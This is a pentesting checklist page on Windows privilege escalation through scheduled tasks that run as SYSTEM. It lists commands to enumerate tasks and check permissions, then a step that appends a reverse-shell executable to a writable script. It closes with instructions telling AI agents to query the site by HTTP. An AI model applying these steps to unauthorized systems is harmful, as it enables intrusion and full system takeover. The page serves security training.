# Scheduled Tasks ### Overview **Scheduled Tasks** can be abused for **local privilege escalation** when a task: * Runs as a **high-privileged account** (SYSTEM / Administrator) * Executes a **binary or script** that is **modifiable by a low-privileged user** * Or has **weak task permissions** allowing modification By **hijacking what the task executes**, an attacker can gain **code execution as SYSTEM or Administrator** when the task runs. ### Why this Works A scheduled task consists of: * **Trigger** (time, logon, event) * **Action** (program/script) * **Security context** (user it runs as) Windows **does not validate file integrity or ownership** at runtime.\ If a low-privileged user can modify: * The **executable** * The **script** * Or the **task definition** then the task becomes a **privesc vector**. ### Prerequisites 1. Local Low-Privileged Access 2. Scheduled Task Runs as High Privilege 3. One of the below: * Writable executable/script * Writable directory in task path * Ability to modify task definition * Unquoted task path ### Check all Scheduled Tasks ```bash # Powershell command Get-ScheduledTask # Command Line schtasks schtasks /query /fo LIST /v schtasks /query /fo LIST /v /TN "" schtasks /query /fo list /v | findstr /i "task\\|run as\\|task to run" # If you don't find the task there you can run the below command # to retrieve the 30 most recent Windows Event Log entries and check for the scheduledtask Get-WinEvent -MaxEvents 30 | findstr "" ``` {% hint style="warning" %} **There can be scheduled tasks that do not appear** when you run the above commands. This usually depends on **permissions, context, and how the task was created**. {% endhint %} ### Steps 1. Identify the task/script: ```bash schtasks /query /tn BackupTask /v /fo LIST ``` 2. Check Script Permissions(Check if full access/write): ```bash accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1 icacls C:\DevTools\CleanUp.ps1 ``` 3. Replace script contents: ```bash echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1 ``` 4. Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/scheduled-tasks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.